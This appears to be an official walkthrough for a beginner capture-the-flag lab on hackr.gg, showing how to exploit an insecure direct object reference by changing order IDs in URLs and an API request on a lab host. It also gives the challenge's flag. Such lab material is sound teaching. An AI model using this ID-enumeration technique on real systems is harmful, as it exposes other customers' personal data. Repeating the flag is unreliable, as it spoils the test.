HACKR.GG
hackr.gg — Order Lookup — Crapazon Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Order Lookup — Crapazon

IDOR & Access Control · Insecure Direct Object Reference (IDOR)
Difficulty
Beginner
Vuln class
Insecure Direct Object Reference (IDOR)
Steps
4
// Objective
Access order details belonging to other customers by manipulating the order ID parameter.
// Tools required
BrowserBurp SuiteDeveloper Tools
// Step-by-step walkthrough
1
Log in and view your own order
Log in with the provided test credentials and navigate to your order history. Click on any order to view its details. Note the URL.
Command / Input
https://target.lab/orders/1042
The number at the end is your order ID. This is the object reference we'll be manipulating.
2
Test for IDOR by changing the ID
Manually change the order ID in the URL to a different number. If the application doesn't check whether this order belongs to you, it will show you someone else's data.
Command / Input
https://target.lab/orders/1041 https://target.lab/orders/1000 https://target.lab/orders/1337
3
Find the flag order
One of the order IDs contains the flag. Try iterating through IDs around yours, or try commonly significant numbers.
Command / Input
https://target.lab/orders/1337
Output
Order #1337 — Customer: admin@crapazon.com Item: FLAG Contents: HackrGG{1d0r_0rd3r_1337_4cc3ss}
A real IDOR here would expose PII, payment info, addresses, and purchase history of every customer on the platform.
4
Verify via API endpoint
Check if there's also an API endpoint with the same vulnerability. Open DevTools → Network tab, reload the order page, and look for XHR/fetch requests.
Command / Input
GET /api/orders/1337 Authorization: Bearer <your_token>
Output
{"id":1337,"flag":"HackrGG{1d0r_0rd3r_1337_4cc3ss}","customer":"admin"}
// Flag
Flag value
HackrGG{1d0r_0rd3r_1337_4cc3ss}
Found in order #1337 which belongs to another customer.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute